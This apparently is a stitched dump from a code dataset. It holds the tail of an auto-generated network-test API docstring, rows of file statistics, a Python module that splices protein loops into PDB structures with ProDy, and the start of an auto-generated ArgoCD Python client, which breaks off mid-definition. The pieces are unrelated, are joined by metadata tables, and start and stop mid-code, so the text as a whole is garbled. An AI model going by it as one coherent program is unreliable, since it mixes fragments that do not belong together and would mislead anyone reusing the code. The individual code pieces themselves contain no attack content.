ck/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ip/twampServer,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/ethernet/emulatedRouterEndpoint,/vport/protocolStack/ethernet/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/ethernet/esmc,/vport/protocolStack/ethernet/fcoeClientEndpoint,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFdiscRange,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFlogiRange,/vport/protocolStack/ethernet/fcoeFwdEndpoint,/vport/protocolStack/ethernet/fcoeFwdEndpoint/range,/vport/protocolStack/ethernet/fcoeFwdEndpoint/secondaryRange,/vport/protocolStack/ethernet/ip,/vport/protocolStack/ethernet/ip/ancp,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ip/twampServer,/vport/protocolStack/ethernet/ipEndpoint,/vport/protocolStack/ethernet/ipEndpoint/ancp,/vport/protocolStack/ethernet/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ipEndpoint/twampServer,/vport/protocolStack/ethernet/pppox,/vport/protocolStack/ethernet/pppox/ancp,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppoxEndpoint,/vport/protocolStack/ethernet/pppoxEndpoint/ancp,/vport/protocolStack/ethernet/pppoxEndpoint/range,/vport/protocolStack/ethernet/pppoxEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/vepaEndpoint,/vport/protocolStack/ethernet/vepaEndpoint/range,/vport/protocolStack/ethernetEndpoint,/vport/protocolStack/ethernetEndpoint/esmc,/vport/protocolStack/fcClientEndpoint,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range/fcClientFdiscRange,/vport/protocolStack/fcClientEndpoint/range/fcClientFlogiRange,/vport/protocolStack/fcFportFwdEndpoint,/vport/protocolStack/fcFportFwdEndpoint/range,/vport/protocolStack/fcFportFwdEndpoint/secondaryRange]
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
| 154.711538
| 23,008
| 0.815009
| 6,847
| 64,360
| 7.637067
| 0.053892
| 0.244746
| 0.178004
| 0.097722
| 0.935725
| 0.927827
| 0.920598
| 0.91991
| 0.914918
| 0.908359
| 0
| 0.010243
| 0.071628
| 64,360
| 415
| 23,009
| 155.084337
| 0.864921
| 0.889093
| 0
| 0.219298
| 0
| 0
| 0.077131
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.263158
| false
| 0
| 0.026316
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
15b618682cd8f241492f5a55668d894316df55eb
| 12,103
|
py
|
Python
|
combs_pub/apps/stitch_loop.py
|
npolizzi/combs_pub
|
a649d6104d7fb81cd75d9a838d630fda1ec5cc4e
|
[
"MIT"
] | null | null | null |
combs_pub/apps/stitch_loop.py
|
npolizzi/combs_pub
|
a649d6104d7fb81cd75d9a838d630fda1ec5cc4e
|
[
"MIT"
] | null | null | null |
combs_pub/apps/stitch_loop.py
|
npolizzi/combs_pub
|
a649d6104d7fb81cd75d9a838d630fda1ec5cc4e
|
[
"MIT"
] | 2
|
2020-11-02T23:04:27.000Z
|
2021-07-11T16:41:36.000Z
|
import os
import prody as pr
import numpy as np
from .functions import writePDBStream
#query_sel_N = 'chain C and resnum 39to44'
#query_sel_C = 'chain D and resnum 4to12'
def paste_loop(path_to_loop, path_to_pdb, query_selection_N, query_selection_C, query_length_N=4, query_length_C=4,
include_sidechains=False):
loop = pr.parsePDB(path_to_loop)
loop.setSegnames('A')
loop_bb = loop.select('backbone')
pdb = pr.parsePDB(path_to_pdb)
query_N = pdb.select(query_selection_N)
query_N_bb = query_N.select('name N C CA')
query_C = pdb.select(query_selection_C)
query_C_bb = query_C.select('name N C CA')
first_resnum_loop = loop_bb.getResnums()[0]
last_resnum_loop = loop_bb.getResnums()[-1]
loop_N_bb = loop_bb.select('name N C CA and resnum `' + str(first_resnum_loop) + 'to' + str(first_resnum_loop + query_length_N - 1) + '`')
loop_C_bb = loop_bb.select('name N C CA and resnum `' + str(last_resnum_loop - query_length_C + 1) + 'to' + str(last_resnum_loop) + '`')
try:
coords_diff_N = loop_N_bb.getCoords() - query_N_bb.getCoords()
coords_diff_C = loop_C_bb.getCoords() - query_C_bb.getCoords()
except ValueError:
print('Loop failure')
ind_match_N = np.argmin([np.linalg.norm(i) for i in coords_diff_N])
ind_match_C = np.argmin([np.linalg.norm(i) for i in coords_diff_C])
loop_N_bb_index = loop_N_bb.getIndices()[ind_match_N]
loop_C_bb_index = loop_C_bb.getIndices()[ind_match_C]
query_N_bb_index = query_N_bb.getIndices()[ind_match_N]
query_C_bb_index = query_C_bb.getIndices()[ind_match_C]
first_index_pdb = pdb.select('backbone').getIndices()[0]
last_index_pdb = pdb.select('backbone').getIndices()[-1]
loop_slice = loop_bb.select('index ' + str(loop_N_bb_index) + 'to' + str(loop_C_bb_index))
if not include_sidechains:
pdb_N = pdb.select('backbone and index ' + str(first_index_pdb) + 'to' + str(query_N_bb_index - 1))
pdb_C = pdb.select('backbone and index ' + str(query_C_bb_index + 1) + 'to' + str(last_index_pdb))
else:
pdb_N = pdb.select('index ' + str(first_index_pdb) + 'to' + str(query_N_bb_index - 1))
pdb_C = pdb.select('index ' + str(query_C_bb_index + 1) + 'to' + str(last_index_pdb))
return pdb_N, loop_slice, pdb_C
def print_loop_pdb(pdb_Ns, loop_slices, pdb_Cs, outdir, keep_resnames=False, keep_ligand=True, original_pdb=None):
"""pdb_Ns, loop_slices, pdb_Cs are lists that should be in order of increasing residue number (i.e., N to C)"""
if outdir[-1] != '/':
outdir += '/'
try:
os.makedirs(outdir)
except:
pass
with open(outdir + repr(pdb_Ns[0]).split()[-3] + '_loops.pdb', 'w') as outfile:
l = len(loop_slices)
pdbC_first_index = pdb_Ns[0].getIndices()[0]
pdbN_first_index_resnum = 0
loop_last_resnum = -1
for i, (pdbN, loop, pdbC) in enumerate(zip(pdb_Ns, loop_slices, pdb_Cs)):
pdbN_first_index = pdbC_first_index
pdbN_resnums = pdbN.getResnums()
if pdbN.select('index ' + str(pdbN_first_index)).getNames()[0] == 'N':
pdbN.setResnums(pdbN_resnums - pdbN_first_index_resnum + loop_last_resnum + 1)
else:
pdbN.setResnums(pdbN_resnums - pdbN_first_index_resnum + loop_last_resnum + 0)
num_ind = len(pdbN.getIndices())
start = 1
finish = start + num_ind
pdbN.setBetas(list(range(start, finish)))
if not keep_resnames:
pdbN.setResnames('GLY')
pdbN.setChids('A')
pdbN.setSegnames('A')
pdbN_last_resnum = pdbN.getResnums()[-1]
loop_resnums = loop.getResnums()
loop_first_resnum = loop_resnums[0]
if loop.getNames()[0] == 'N':
loop.setResnums(loop_resnums - loop_first_resnum + pdbN_last_resnum + 1)
else:
loop.setResnums(loop_resnums - loop_first_resnum + pdbN_last_resnum)
loop.setChids('A')
num_ind = len(loop.getIndices())
start = finish
finish = start + num_ind
loop.setBetas(list(range(start, finish)))
loop.setResnames('GLY')
pdbN_last_index = pdbN.getIndices()[-1]
loop_last_resnum = loop.getResnums()[-1]
pdbC_first_index = pdbC.getIndices()[0]
pdbN_first_index_resnum = pdbC.select('index ' + str(pdbC_first_index)).getResnums()[0]
writePDBStream(outfile, pdbN.select('index ' + str(pdbN_first_index) + 'to' + str(pdbN_last_index)))
writePDBStream(outfile, loop)
pdbN.setResnums(pdbN_resnums)
loop.setResnums(loop_resnums)
if i + 1 == l:
num_ind = len(pdbC.getIndices())
start = finish
finish = start + num_ind
pdbC.setBetas(list(range(start, finish)))
if not keep_resnames:
pdbC.setResnames('GLY')
pdbC_resnums = pdbC.getResnums()
pdbC_first_resnum = pdbC_resnums[0]
if pdbC.getNames()[0] == 'N':
pdbC.setResnums(pdbC_resnums - pdbC_first_resnum + loop_last_resnum + 1)
else:
pdbC.setResnums(pdbC_resnums - pdbC_first_resnum + loop_last_resnum)
pdbC.setChids('A')
pdbC.setSegnames('A')
writePDBStream(outfile, pdbC)
pdbC.setResnums(pdbC_resnums)
if keep_ligand and original_pdb is not None:
pdb = pr.parsePDB(original_pdb)
lig = pdb.select('not protein')
num_ind = len(lig.getIndices())
start = finish
finish = start + num_ind
lig.setBetas(list(range(start, finish)))
writePDBStream(outfile, lig)
def paste_bulge(path_to_loop, path_to_pdb, query_selection_N, query_selection_C, query_length_N=4, query_length_C=4):
loop = pr.parsePDB(path_to_loop)
loop.setSegnames('A')
keep = list()
psi_prev = 0
for i, res in enumerate(loop.iterResidues()):
if i > 0:
try:
phi = pr.calcPhi(res)
except:
phi = 0
try:
psi = pr.calcPsi(res)
if psi > -32 and (phi + psi_prev <= -125):
resnum = set(res.getResnums()).pop()
keep.append(resnum + 4)
psi_prev = psi
except:
pass
if len(keep) > 0:
loop_bb = loop.select('backbone or resnum ' + ' '.join([str(i) for i in keep]))
loop.select('not resnum ' + ' '.join([str(i) for i in keep])).setResnames('GLY')
else:
loop_bb = loop.select('backbone')
loop.setResnames('GLY')
pdb = pr.parsePDB(path_to_pdb)
query_N_bb = pdb.select(query_selection_N + ' and name N C CA')
query_C_bb = pdb.select(query_selection_C + ' and name N C CA')
first_resnum_loop = loop_bb.getResnums()[0]
last_resnum_loop = loop_bb.getResnums()[-1]
n_last = first_resnum_loop + query_length_N - 1
c_first = last_resnum_loop - query_length_C + 1
if len(keep) > 0:
if any([k <= n_last for k in keep]):
n_last = min(keep) - 1
if any([k >= c_first for k in keep]):
c_first = max(keep) + 1
if n_last <= first_resnum_loop:
n_last = first_resnum_loop + 1
if c_first >= last_resnum_loop:
c_first = last_resnum_loop - 1
loop_N_bb = loop_bb.select('name N C CA and resnum `' + str(first_resnum_loop) + 'to' + str(n_last) + '`')
loop_C_bb = loop_bb.select('name N C CA and resnum `' + str(c_first) + 'to' + str(last_resnum_loop) + '`')
len_loop_N = n_last - first_resnum_loop + 1
len_loop_C = last_resnum_loop - c_first + 1
print('len loop N bb=', len_loop_N)
print('len loop C bb=', len_loop_C)
try:
coords_diff_N = loop_N_bb.getCoords() - query_N_bb.getCoords()[:len_loop_N*3+1]
coords_diff_C = loop_C_bb.getCoords() - query_C_bb.getCoords()[-len_loop_C*3:]
except ValueError:
print('Loop failure')
ind_match_N = np.argmin([np.linalg.norm(i) for i in coords_diff_N])
ind_match_C = np.argmin([np.linalg.norm(i) for i in coords_diff_C])
loop_N_bb_index = loop_N_bb.getIndices()[ind_match_N]
loop_C_bb_index = loop_C_bb.getIndices()[ind_match_C]
query_N_bb_index = query_N_bb.getIndices()[ind_match_N]
query_C_bb_index = query_C_bb.getIndices()[ind_match_C]
first_index_pdb = pdb.select('backbone').getIndices()[0]
last_index_pdb = pdb.select('backbone').getIndices()[-1]
loop_slice = loop_bb.select('index ' + str(loop_N_bb_index) + 'to' + str(loop_C_bb_index))
pdb_N = pdb.select('backbone and index ' + str(first_index_pdb) + 'to' + str(query_N_bb_index - 1))
pdb_C = pdb.select('backbone and index ' + str(query_C_bb_index + 1) + 'to' + str(last_index_pdb))
return pdb_N, loop_slice, pdb_C
def print_bulge_pdb(pdb_Ns, loop_slices, pdb_Cs, outdir):
"""pdb_Ns, loop_slices, pdb_Cs are lists that should be in order of increasing residue number (i.e., N to C)"""
if outdir[-1] != '/':
outdir += '/'
try:
os.makedirs(outdir)
except:
pass
with open(outdir + repr(loop_slices[0]).split()[-3] + '_' + repr(pdb_Ns[0]).split()[-3] + '_loop.pdb', 'w') as outfile:
l = len(loop_slices)
pdbC_first_index = pdb_Ns[0].getIndices()[0]
pdbN_first_index_resnum = 0
loop_last_resnum = -1
for i, (pdbN, loop, pdbC) in enumerate(zip(pdb_Ns, loop_slices, pdb_Cs)):
pdbN_first_index = pdbC_first_index
pdbN_resnums = pdbN.getResnums()
if pdbN.select('index ' + str(pdbN_first_index)).getNames()[0] == 'N':
pdbN.setResnums(pdbN_resnums - pdbN_first_index_resnum + loop_last_resnum + 1)
else:
pdbN.setResnums(pdbN_resnums - pdbN_first_index_resnum + loop_last_resnum + 0)
num_ind = len(pdbN.getIndices())
start = 1
finish = start + num_ind
pdbN.setBetas(list(range(start, finish)))
pdbN.setResnames('GLY')
pdbN.setChids('A')
pdbN_last_resnum = pdbN.getResnums()[-1]
loop_resnums = loop.getResnums()
loop_first_resnum = loop_resnums[0]
if loop.getNames()[0] == 'N':
loop.setResnums(loop_resnums - loop_first_resnum + pdbN_last_resnum + 1)
else:
loop.setResnums(loop_resnums - loop_first_resnum + pdbN_last_resnum)
loop.setChids('A')
num_ind = len(loop.getIndices())
start = finish
finish = start + num_ind
loop.setBetas(list(range(start, finish)))
pdbN_last_index = pdbN.getIndices()[-1]
loop_last_resnum = loop.getResnums()[-1]
pdbC_first_index = pdbC.getIndices()[0]
pdbN_first_index_resnum = pdbC.select('index ' + str(pdbC_first_index)).getResnums()[0]
writePDBStream(outfile, pdbN.select('index ' + str(pdbN_first_index) + 'to' + str(pdbN_last_index)))
writePDBStream(outfile, loop)
pdbN.setResnums(pdbN_resnums)
loop.setResnums(loop_resnums)
if i + 1 == l:
num_ind = len(pdbC.getIndices())
start = finish
finish = start + num_ind
pdbC.setBetas(list(range(start, finish)))
pdbC.setResnames('GLY')
pdbC_resnums = pdbC.getResnums()
pdbC_first_resnum = pdbC_resnums[0]
if pdbC.getNames()[0] == 'N':
pdbC.setResnums(pdbC_resnums - pdbC_first_resnum + loop_last_resnum + 1)
else:
pdbC.setResnums(pdbC_resnums - pdbC_first_resnum + loop_last_resnum)
pdbC.setChids('A')
writePDBStream(outfile, pdbC)
pdbC.setResnums(pdbC_resnums)
| 44.496324
| 142
| 0.607618
| 1,665
| 12,103
| 4.106907
| 0.084084
| 0.046797
| 0.032904
| 0.009359
| 0.866628
| 0.815882
| 0.80155
| 0.770401
| 0.731939
| 0.715268
| 0
| 0.011055
| 0.275056
| 12,103
| 272
| 143
| 44.496324
| 0.768293
| 0.024209
| 0
| 0.733051
| 0
| 0
| 0.044411
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016949
| false
| 0.012712
| 0.016949
| 0
| 0.042373
| 0.025424
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
15bdd56c9996afd83d7fa05892a85ba59fbbd705
| 136,540
|
py
|
Python
|
argocd_python_client/api/application_service_api.py
|
RyanSiu1995/argocd-python-client
|
2e8f097fe09f247a46ac70692241a93d1acd076a
|
[
"MIT"
] | 1
|
2021-11-20T13:37:43.000Z
|
2021-11-20T13:37:43.000Z
|
argocd_python_client/api/application_service_api.py
|
RyanSiu1995/argocd-python-client
|
2e8f097fe09f247a46ac70692241a93d1acd076a
|
[
"MIT"
] | null | null | null |
argocd_python_client/api/application_service_api.py
|
RyanSiu1995/argocd-python-client
|
2e8f097fe09f247a46ac70692241a93d1acd076a
|
[
"MIT"
] | null | null | null |
"""
Consolidate Services
Description of all APIs # noqa: E501
The version of the OpenAPI document: version not set
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from argocd_python_client.api_client import ApiClient, Endpoint as _Endpoint
from argocd_python_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from argocd_python_client.model.application_application_patch_request import ApplicationApplicationPatchRequest
from argocd_python_client.model.application_application_resource_response import ApplicationApplicationResourceResponse
from argocd_python_client.model.application_application_rollback_request import ApplicationApplicationRollbackRequest
from argocd_python_client.model.application_application_sync_request import ApplicationApplicationSyncRequest
from argocd_python_client.model.application_application_sync_windows_response import ApplicationApplicationSyncWindowsResponse
from argocd_python_client.model.application_managed_resources_response import ApplicationManagedResourcesResponse
from argocd_python_client.model.application_resource_actions_list_response import ApplicationResourceActionsListResponse
from argocd_python_client.model.repository_manifest_response import RepositoryManifestResponse
from argocd_python_client.model.runtime_error import RuntimeError
from argocd_python_client.model.stream_result_of_application_log_entry import StreamResultOfApplicationLogEntry
from argocd_python_client.model.stream_result_of_v1alpha1_application_tree import StreamResultOfV1alpha1ApplicationTree
from argocd_python_client.model.stream_result_of_v1alpha1_application_watch_event import StreamResultOfV1alpha1ApplicationWatchEvent
from argocd_python_client.model.v1_event_list import V1EventList
from argocd_python_client.model.v1alpha1_application import V1alpha1Application
from argocd_python_client.model.v1alpha1_application_list import V1alpha1ApplicationList
from argocd_python_client.model.v1alpha1_application_spec import V1alpha1ApplicationSpec
from argocd_python_client.model.v1alpha1_application_tree import V1alpha1ApplicationTree
from argocd_python_client.model.v1alpha1_revision_metadata import V1alpha1RevisionMetadata
class ApplicationServiceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __application_service_create(
self,
body,
**kwargs
):
"""Create creates an application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_create(body, async_req=True)
>>> result = thread.get()
Args:
body (V1alpha1Application):
Keyword Args:
upsert (bool): [optional]
validate (bool): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_create = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications',
'operation_id': 'application_service_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'body',
'upsert',
'validate',
